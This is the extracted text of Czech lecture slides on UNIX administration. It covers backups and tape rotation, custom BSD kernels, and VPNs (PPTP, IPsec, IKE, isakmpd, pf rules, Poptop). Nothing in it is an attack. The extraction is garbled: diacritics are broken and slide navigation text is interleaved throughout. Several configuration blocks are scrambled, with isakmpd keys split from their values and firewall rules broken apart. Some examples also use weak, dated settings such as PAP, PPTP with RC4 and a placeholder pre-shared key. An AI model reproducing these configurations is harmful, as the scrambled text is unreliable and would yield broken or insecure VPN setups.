software dump/restore /etc/dumpdates – znaˇcky archivací jednotlivých úrovní zálohuje cokoliv na libovolný poˇcet pásek zvládá pˇrírustky ˚
tar, cpio bezpeˇcnost: používejte archivaci ATIME, MTIME, CTIME metadat cpio: dokáže pˇreskakovat chyby
amanda
Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
Zálohování – pˇríklady
Administrace UNIXu Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ
# dump -a -0 -f - /usr/local | ( cd /usr/local2 ; restore -x -f - ) # dump -a0uf - /etc | gzip >/bck/full.gz
# tar cf - /usr/local | tar -xf - -C /usr/local2
Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
Zálohování – problematika
Administrace UNIXu Leo Galamboš SSH
Potˇrebujeme
Tisk ˇ rení a dohled Meˇ
1
poslední zálohu
2
zálohy z pˇredchozí doby
Zálohování
3
neutratit vše za média
Vyzkoušejte si
ˇ Rešení rotování médií sofistikovaný algoritmus rotování ˇ Hanojská vež GFS (grandfather-father-son)
Dohled nad prutoky ˚ Dohled nad systémy
Administrace UNIXu
ˇ Hanojská vež
Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování
1−2−1−3−1−2−1−4−1−2−1−3−1−2−1−5−1−2−1−3−1−2−1−4−1−2−1−3−1−2−1
5 médií – rotování na 31 dní
Vyzkoušejte si
Administrace UNIXu
GFS
Leo Galamboš SSH
Po Ut St Ct Pa
Tisk
Tˇri druhy médií
ˇ rení a dohled Meˇ Dohled nad prutoky ˚
syn denní pˇrírustková ˚ záloha otec týdenní plná záloha ˇ ˇ cní plná záloha dedek mesíˇ ˇ Priorita: dedek otec syn
Kolize ˇ prioritou. Každý den se provádí jen záloha s nejvetší
Dohled nad systémy
Zálohování Vyzkoušejte si
Vyzkoušejte si
Administrace UNIXu Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
1
centralizujte logy na jednu ze stanic
Zálohování
2
ˇ dohledové centrum zprovoznete
Vyzkoušejte si
3
monitorujte prutok ˚ pˇres stroj RT
4
monitorujte velikost disku˚ jednotlivých stroju˚
5
vytvoˇrte vlastní politiku záloh
Vlastní jádro
Administrace UNIXu Leo Galamboš SSH
Proˇc kompilovat vlastní jádro standardneˇ dodané jádro nepodporuje dané zaˇrízení a boot -c nepomáhá potˇrebujeme experimentální moduly jádra potˇrebujeme jiná nastavení pro atypická nasazení a sysctl(8) nepomáhá Co je potˇreba? zdrojové kódy jádra (OpenBSD: srcsys.tar.gz; ˇ FreeBSD, Linux: vetšinou balíˇcky) pˇrekladaˇc a ˇradu utilit
Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
(Open)BSD: vlastní jádro Postup tvorby nového jádra srcsys.tar.gz vytvoˇrí strom v /usr/src/sys/...
Administrace UNIXu Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ
.../arch/i386/conf/ obsahuje konfiguraˇcní soubory
Zálohování
nad konfiguraˇcním souborem se spustí config(8)
Vyzkoušejte si
vznikne mašinérie v .../arch/i386/compile (../compile) spustí se make(1) z mašinérie výsledné jádro se nakopíruje místo starého staré jádro se typicky pˇresouvá do /bsd.old aby bylo po ruce v pˇrípadeˇ rollbacku Konfigurace živého jádra 1
config -e -o /bsd.new /bsd
2
config -e -f /bsd
Dohled nad prutoky ˚ Dohled nad systémy
Administrace UNIXu Leo Galamboš VPN PPTP IPSec SPD a SAD
ˇ Cást VIII
IKE/ISAKMP
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
Virtual Private Network (VPN)
ˇ Záver
Program
Administrace UNIXu Leo Galamboš VPN
38
VPN PPTP IPSec SPD a SAD IKE/ISAKMP
PPTP IPSec SPD a SAD IKE/ISAKMP
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
39
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
40
ˇ Záver
Administrace UNIXu
Internet
IPSec
Leo Galamboš Štít
VPN PPTP IPSec SPD a SAD IKE/ISAKMP
Road warrior
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
Dohled Tisk
SMTP
Zálohování DNS
AMD
NIS/YP
NFS
Administrace UNIXu
Nasazení
Leo Galamboš VPN PPTP IPSec SPD a SAD IKE/ISAKMP Tunel
Konfigurace Internet
IPSec ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver Road warrior
bezpeˇcné pˇripojení ke svým datum ˚ i na cestách spojení na veˇrejných (levných) linkách s ochranou proti odposlechu ˇ propojení více privátních sítí pˇremostením pˇres Internet snížení nákladu˚ na privátní linky velká pˇrenosová rychlost
Technologie
Administrace UNIXu Leo Galamboš
PPTP (RFC 2637) obzvlášteˇ nešt’astná implementace spoleˇcnosti Microsoft (vylepšeno posledními aktualizacemi) PPTP server dostupný spolu s Windows Server ˇ klientský software poˇcínaje Windows NT vestavený Poptop73 je OSS PPTP server (i pro Linux, BSD. . . ) nahrazováno L2TP/IPsec74
IPsec komplikovaná technologie dobˇre vyˇrešené bezpeˇcnostní aspekty ochrana: šifrování, autentizace, ochrana integrity toku i jeho "pˇrehrání" ˇ eˇ zaveden i do IPv4 (poˇcátek vyvinut pro IPv6, zpetn 90. let)
73 74
http://www.poptop.org/ více než 100 kliknutí v XP, pouze 15 ve Vista
VPN PPTP IPSec SPD a SAD IKE/ISAKMP
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
Administrace UNIXu
Point to Point Tunnelling
Leo Galamboš
PPP
VPN PPTP IPSec SPD a SAD IKE/ISAKMP
Konfigurace IPSec ISAKMPD
PPTP
ˇ Firewall a smerování PPTP
ˇ Záver
PPTP je varianta VPN pro zabezpeˇcený pˇrístup do korporátních sítí ˇrídící spoj nad TCP/1723 – ustavuje a ruší sezení v rámci tunelu tunel nad GRE se zakódovanými a kompresovanými PPP pakety autentizace: MSCHAPv2, MSCHAP, CHAP, PAP kódování pˇres moduly (kompresní): RC4 40-128b
otevˇrený standard (RFC2637)
IPSec módy
Administrace UNIXu Leo Galamboš VPN PPTP IPSec SPD a SAD IKE/ISAKMP
Konfigurace IPSec ISAKMPD
transport hlaviˇcka prozrazuje skuteˇcného pˇríjemce a odesílatele tunel hlaviˇcka prozrazuje oba konce tunelu
ˇ Firewall a smerování PPTP
ˇ Záver
Protokoly a základní termíny
Administrace UNIXu Leo Galamboš VPN PPTP IPSec
Security Association (SA) Internet Key Exchange (IKE) autentizuje uzly a nastavuje zabezpeˇcení na spoji veˇrejným klíˇcem digitálním podpisem dopˇredu známým (spoleˇcným) tajným klíˇcem
Authentication Header (AH) zajišt’uje integritu a autenticitu dat rychlá hash-funkce na obsah pˇrenášených dat
Encapsulation Security Payload (ESP) zajišt’uje utajení, integritu a autenticitu toku
SPD a SAD IKE/ISAKMP
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
AH hlaviˇcka
Administrace UNIXu Leo Galamboš VPN
next header: protokol puvodního ˚ pˇrenášeného paketu délka AH hlaviˇcky v 32b slovech Security Parameters Index (SPI) identifikuje parametry AH75 sekvenˇcní cˇ íslo brání opakovanému pˇrehrávání toku autentizaˇcní hodnota (Integrity Check Value)
ICV se poˇcítá na základech MD5 nebo SHA1 s “barvením” tajným klíˇcem – HMAC76 RFC 2104
75 76
Algoritmus hashe, jeho parametry, atp. Hashed Message Authentication Code
PPTP IPSec SPD a SAD IKE/ISAKMP
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
AH transport
Administrace UNIXu Leo Galamboš VPN PPTP IPSec
nová IP hlaviˇcka specifikuje protokol AH ˇ paketu obsahuje: nové telo
SPD a SAD IKE/ISAKMP
Konfigurace IPSec
AH hlaviˇcka: next header je protokol v puvodní ˚ IP hlaviˇcce ˇ puvodního telo ˚ IP paketu
ˇ ˇ ICV pokrývá vše vyjma: ICV a nekolika promenných položek v nové IP hlaviˇcce (TOS, flags, frag offset, TTL, header checksum)
ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
AH tunel
Administrace UNIXu Leo Galamboš VPN PPTP
nová IP hlaviˇcka specifikuje protokol AH
IPSec SPD a SAD IKE/ISAKMP
nová IP hlaviˇcka muže ˚ nést jiné src/dst IP adresy ˇ paketu obsahuje: nové telo AH hlaviˇcka: next header je IP (obalujeme celý puvodní ˚ IP paket) celý puvodní ˚ IP paket
ˇ pokrývá vše vyjma: ICV a nekolika ˇ ˇ ICV opet promenných položek v nové IP hlaviˇcce (TOS, flags, frag offset, TTL, header checksum)
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
ESP hlaviˇcka a patiˇcka
Administrace UNIXu Leo Galamboš
ESP položky obklopují pˇrenášený obsah, hlaviˇcka nese SPI
VPN PPTP IPSec SPD a SAD
sekvenˇcní cˇ íslo a patiˇcka nese
IKE/ISAKMP
Konfigurace IPSec ISAKMPD
výplnˇ pro šifrovací algoritmy s pevnou velikostí bloku velikost výplneˇ next header autentizaˇcní hodnota (volitelneˇ pˇri ESP+auth) ICV pokrývá ESP hlaviˇcku i patiˇcku (bez ICV) a ˇ r) celý obsah IP paketu pˇrenášený obsah, nikoliv (témeˇ jako u AH Šifruje se pˇrenášený obsah a patiˇcka bez ICV
ˇ Firewall a smerování PPTP
ˇ Záver
ESP transport
Administrace UNIXu Leo Galamboš VPN PPTP IPSec SPD a SAD
nová IP hlaviˇcka specifikuje protokol ESP ˇ paketu obsahuje: nové telo ESP hlaviˇcka a patiˇcka: next header je protokol v puvodní ˚ IP hlaviˇcce ˇ puvodního telo ˚ IP paketu
ESP hlaviˇcka se nešifruje, ale patiˇcka bez ICV ano!
IKE/ISAKMP
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
ESP tunel
Administrace UNIXu Leo Galamboš VPN PPTP IPSec
nová IP hlaviˇcka specifikuje protokol ESP nová IP hlaviˇcka muže ˚ nést jiné src/dst IP adresy ˇ paketu obsahuje: nové telo ESP hlaviˇcka a patiˇcka: next header je IP (obalujeme celý puvodní ˚ IP paket) celý puvodní ˚ IP paket
Z paketu nelze nic zásadního vyˇcíst, protože i “next header” položka je šifrována
SPD a SAD IKE/ISAKMP
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
Administrace UNIXu
IKE
Leo Galamboš VPN
B
PPTP IPSec SPD a SAD IKE/ISAKMP
Konfigurace 1 IKE
2
IPSec
router A – nutnost šifrovat
ˇ Firewall a smerování
3
A-IKE↔B-IKE
4
dohoda o IPSec SA
5
A má koneˇcneˇ SA s B
6
A→B - nyní již projde
IKE
A
A→B - není IPSec SA
ISAKMPD
PPTP
ˇ Záver
Celá pohádka najednou. . . kterak A komunikovalo s B a mezi nimi byla IPSec roura ˇ mezi jejich smerovaˇ ci RTA a RTB: 1 A posílá zprávu (paket) 2 RTA to vidí a podle svého nastavení zjistí, že podléhá šifrování 3 nastavení také ˇríká, že tunel povede do RTB 4 RTA si zjistí, zda-li již má IPSec SA s RTB, pokud ne:
Administrace UNIXu Leo Galamboš VPN PPTP IPSec SPD a SAD IKE/ISAKMP
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
RTA požádá své IKE o dodání IPSec SA k RTB máme IKE SA RTA-RTB? ano, pak je IPSec SA rychle vytvoˇreno ˇ eˇ ne, IKE SA vznikne (souˇcasneˇ dojde k výmen digitálních podpisu˚ IKE procesu) ˚
pˇri nastavení IPSec SA dojde k dohodeˇ o kódovacím algoritmu (DES. . . ) autentizaˇcním algoritmu (MD5. . . ) 5 6 7
RTA patˇriˇcneˇ zpracuje paket a odešle jej RTB RTB obdrží paket, zjistí pˇríslušný IPSec SA zpracuje paket a odešle jej B
Security Policy
Administrace UNIXu Leo Galamboš VPN PPTP
ˇ šifrovat? Definujeme filtr: Jak víme, že máme neco
IPSec SPD a SAD IKE/ISAKMP
pravidlem o nakládání se vstupním cˇ i výstupním tokem (na RTA, RTB) autentizaˇcní metoda metoda zabezpeˇcení (AH, ESP) hashovací funkce (SHA, MD5)
Security Policy Database Souhrn všech "Security Policy"v systému, který je konfigurován administrátorem.
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
Security Association
Administrace UNIXu Leo Galamboš VPN
1
cílová IP adresa
2
32b Security Parameter Index (SPI) – obdoba portu na úrovni TCP/UDP
PPTP IPSec SPD a SAD
3
identifikátor bezpeˇcnostního protokolu (esp, ah)
IKE/ISAKMP
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
Filtr to odboˇcil, cˇ ím ale šifrovat? Pˇres SPI do tabulky, ale SPI není samostatneˇ jednoznaˇcné, proto se indexuje v SA Database (SAD) celou trojicí (SA).
Jak naplníme SAD? Ruˇcneˇ anebo lépe automaticky, protokolem IKE/ISAKMP.
ˇ Záver
IKE/ISAKMP Internet Key Exchange protokol zajišt’uje bezpeˇcnou ˇ informací pro výpoˇcet šifrovacích klíˇcu˚ výmenu ˇ oddelený od IPSec s využitím pro jiné protokoly (OSPF, SSL/TLS. . . ) ˇ domlouvá SA a vymeˇ nuje kryptomateriál (klíˇce)77 Main/aggressive mode (AKA fáze 1) ˇ domlouvá a ustavuje jeden bezpeˇcný obousmerný kanál (ISAKMP Security Association) ˇ vymeˇ nuje kryptografický materiál (klíˇce) a na jeho základeˇ ustavuje sdílený tajný klíˇc autentizuje uzly (poˇcítaˇcové identity)
Quick mode (AKA fáze 2) domlouvá a ustavuje bezpeˇcný kanál pro datový ˇ pˇrenos mezi dvema uzly ˇ výsledkem jsou nejméneˇ dveˇ jednosmerné SA ˇ SAD (in/out) – naplnení
UDP zprávy z/na port 500 77
Totéž lze manuálneˇ s ipsecadm(8)
Administrace UNIXu Leo Galamboš VPN PPTP IPSec SPD a SAD IKE/ISAKMP
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
Administrace UNIXu
ˇ IKE podrobneji
Leo Galamboš
Fáze 1 ˇ ˇ main – oddelená výmena klíˇcu˚ a autentizace (6 zpráv)
VPN PPTP IPSec SPD a SAD IKE/ISAKMP
aggressive – kondenzovaný "main"(3 zprávy)
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
Policy proposals Policy acceptance
Diffie-Hellman/Nonce Diffie-Hellman/Nonce
Identification/Certificate/Signature Identification/Certificate/Signature
Administrace UNIXu
ˇ IKE podrobneji
Leo Galamboš
Fáze 2 (quick mód) – 3 zprávy
VPN PPTP IPSec SPD a SAD IKE/ISAKMP
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
Hash/IPsec proposal/Nonce/[Diffie-Hellman/Identities]
Hash/IPsec policy acceptance/Nonce/[Diffie-Hellman/Identities]
Hash
ISAKMP Quick mode
Administrace UNIXu Leo Galamboš VPN PPTP IPSec SPD a SAD
ˇ Úspešná dohoda o zabezpeˇceném kanálu Vzniknou dveˇ IPSec SA: jedna pro vstupní a druhá pro odchozí tok s vlastními SPI. Nakonec tedy existují tˇri SA
IKE/ISAKMP
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
1
ISAKMP IKE SA: chrání (budoucí) Main mode a Quick mode
2
pˇríchozí IPSec SA: chrání data na vstupu od IPSec ˇ protejšku
3
odchozí IPSec SA: chrání data odesílaná IPSec ˇ protejšku
ˇ Záver
ISAKMP Quick mode implementace
Administrace UNIXu Leo Galamboš VPN PPTP
ˇ minutách ticha na pˇríchozím IPSec SA se po peti vyˇcistí obeˇ IPSec SA ˇ reinicializace probehne Quick módem a vzniknou nové klíˇce i SPI expirace IPSec SA Quick módu je po jedné hodineˇ anebo 100MB toku ˇ minutách pˇred expirací pˇrenos v posledních peti spustí automatickou regeneraci inicializaci nového Quick módu spustí strana, která odbavila více dat nebo ta, která iniciovala pˇredchozí Quick mód
IPSec SPD a SAD IKE/ISAKMP
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
Administrace UNIXu
Prostˇredí
Leo Galamboš VPN PPTP IPSec SPD a SAD IKE/ISAKMP
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
Tunel
Internet
Road warrior
ˇ Záver
Spoleˇcné nastavení
Administrace UNIXu Leo Galamboš VPN PPTP IPSec SPD a SAD IKE/ISAKMP
/etc/sysctl.conf net.inet.esp.enable=1
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování
net.inet.ah.enable=1 net.inet.ip.forwarding=1 /etc/rc.conf.local pf=YES isakmpd_flags=
PPTP
ˇ Záver
Nastavení isakmpd
Administrace UNIXu Leo Galamboš VPN PPTP IPSec SPD a SAD IKE/ISAKMP
Konfigurace IPSec
/etc/isakmpd/isakmpd.conf – základní konfigurace isakmpd(8) /etc/isakmpd/isakmpd.policy – bezpeˇcnostní ˇ klíˇcu˚ pravidla pro výmenu
ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
/etc/isakmpd/isakmpd.policy
Administrace UNIXu Leo Galamboš VPN PPTP IPSec SPD a SAD IKE/ISAKMP
Konfigurace IPSec
Keynote-version: 2 Authorizer: "POLICY" Conditions: app_domain == "IPsec policy" && esp_present == "yes" && esp_enc_alg != "null" -> "true";
ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
/etc/isakmpd/isakmpd.conf
Administrace UNIXu Leo Galamboš VPN PPTP IPSec
[General] Listen-On= 192.168.1.A [Phase 1] 192.168.1.B= peer-B
SPD a SAD IKE/ISAKMP
Konfigurace IPSec ISAKMPD
[Phase 2] Connections= VPN-A-B
ˇ Firewall a smerování PPTP
ˇ Záver
[peer-B] Phase= Address= Configuration= Authentication=
1 192.168.1.B Default-main-mode hesloAB
[VPN-A-B] Phase= ISAKMP-peer= Configuration= Local-ID= Remote-ID=
2 peer-B Default-quick-mode A-internal-network B-internal-network
/etc/isakmpd/isakmpd.conf
Administrace UNIXu Leo Galamboš VPN PPTP IPSec SPD a SAD
[A-internal-network] ID-type= IPV4_ADDR_SUBNET Network= 10.100.100.0 Netmask= 255.255.255.0
IKE/ISAKMP
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování
[B-internal-network] ID-type= IPV4_ADDR_SUBNET Network= 10.0.100.0 Netmask= 255.255.255.0 [Default-main-mode] EXCHANGE_TYPE= ID_PROT Transforms= 3DES-SHA,BLF-SHA [Default-quick-mode] EXCHANGE_TYPE= QUICK_MODE Suites= QM-ESP-3DES-SHA-SUITE
PPTP
ˇ Záver
Zabezpeˇcení konfigurace
Administrace UNIXu Leo Galamboš VPN PPTP IPSec SPD a SAD IKE/ISAKMP
Konfigurace IPSec ISAKMPD
chown chmod chown chmod
root:wheel /etc/isakmpd/isakmpd.conf 0600 /etc/isakmpd/isakmpd.conf root:wheel /etc/isakmpd/isakmpd.policy 0600 /etc/isakmpd/isakmpd.policy
ˇ Firewall a smerování PPTP
ˇ Záver
ˇ Nastavení firewallu a smerování
Administrace UNIXu Leo Galamboš VPN PPTP IPSec
int_if="le1" ext_if="le2"
SPD a SAD IKE/ISAKMP
Konfigurace block log on { enc0, $ext_if } all
IPSec ISAKMPD
pass in proto esp from $GTW_B to $GTW_A pass out proto esp from $GTW_A to $GTW_B pass in on enc0 proto ipencap from $GTW_B to $GTW_A pass in on enc0 from $NET_B to $NET_A pass out on enc0 from $NET_A to $NET_B pass in on $ext_if proto udp from $GTW_B port = 500 to $GTW_A port = 500 pass out on $ext_if proto udp from $GTW_A port = 500 to $GTW_B port = 500
route add -net $NET_B $INNER_A
ˇ Firewall a smerování PPTP
ˇ Záver
PPTP
Administrace UNIXu Leo Galamboš
Poptop
VPN PPTP
integrace pˇres RADIUS rozšíˇrení do Microsoft prostˇredí (LDAP, SAMBA) podpora Windows od 95 po XP, authetizace a kódování na bázi MSCHAPv2, MPPE 40-128 bit RC4
IPSec SPD a SAD IKE/ISAKMP
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
Pˇríprava kernelu s podporou GRE (Generic Routing Encapsulation) a tunX rozhraní pˇridání tunX rozhraní podle poˇctu uživatelu˚ instalace a konfigurace Poptop a PPP (PPTPD, PPPD) úprava pravidel firewallu
Kernel
Administrace UNIXu Leo Galamboš VPN PPTP IPSec SPD a SAD
pseudo-device gre
IKE/ISAKMP
Konfigurace IPSec
# odpovídá poˇ ctu pˇ ripojovaných uživatel˚ u pseudo-device tun 50
ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
cd /dev sh ./MAKEDEV ‘seq -f "tun%.0f" 4 49‘
PPP
Administrace UNIXu Leo Galamboš VPN PPTP IPSec SPD a SAD IKE/ISAKMP
Konfigurace
/etc/pptpd.conf
IPSec ISAKMPD ˇ Firewall a smerování
option /etc/ppp/options localip $INNER_A_FREEIP remoteip $INNER_A_FREEBLOCK listen $GTW_A
PPTP
ˇ Záver
PPP
Administrace UNIXu Leo Galamboš VPN PPTP IPSec SPD a SAD IKE/ISAKMP
/etc/ppp/ppp.conf
Konfigurace IPSec
pptp: set timeout 0 set ifaddr $INNER_A_FREEIP $INNER_A_FREEBLOCK 255.255.255.255 enable pap enable chap enable MSChapV2 disable ipv6 enable proxy set dns $INNER_A_DNS set nbns $INNER_A_WINS
ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver
PPP
Administrace UNIXu Leo Galamboš
/etc/ppp/ppp.secret mask: 0400
VPN PPTP IPSec SPD a SAD
# static alloc username0 password0 staticip
IKE/ISAKMP
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování
# dynamic alloc username1 password1 *
if [ -x /usr/local/sbin/pptpd ]; then echo -n " pptpd"; /usr/local/sbin/pptpd -d fi
PPTP
ˇ Záver
Nastavení firewallu
Administrace UNIXu Leo Galamboš VPN PPTP IPSec SPD a SAD IKE/ISAKMP
Konfigurace IPSec ISAKMPD
pass pass pass pass pass pass pass
in quick on $ext_if proto tcp from any to $ext_if port = 1723 modulate state Firewall a smerování ˇ in quick on $ext_if proto gre from any to $ext_if keep state PPTP out quick on $ext_if proto gre from $ext_if to any keep state ˇ Záver on tun0 all on tun1 all on tun2 all on tun3 all
The end
Administrace UNIXu Leo Galamboš VPN PPTP IPSec SPD a SAD IKE/ISAKMP
Konfigurace IPSec ISAKMPD ˇ Firewall a smerování PPTP
ˇ Záver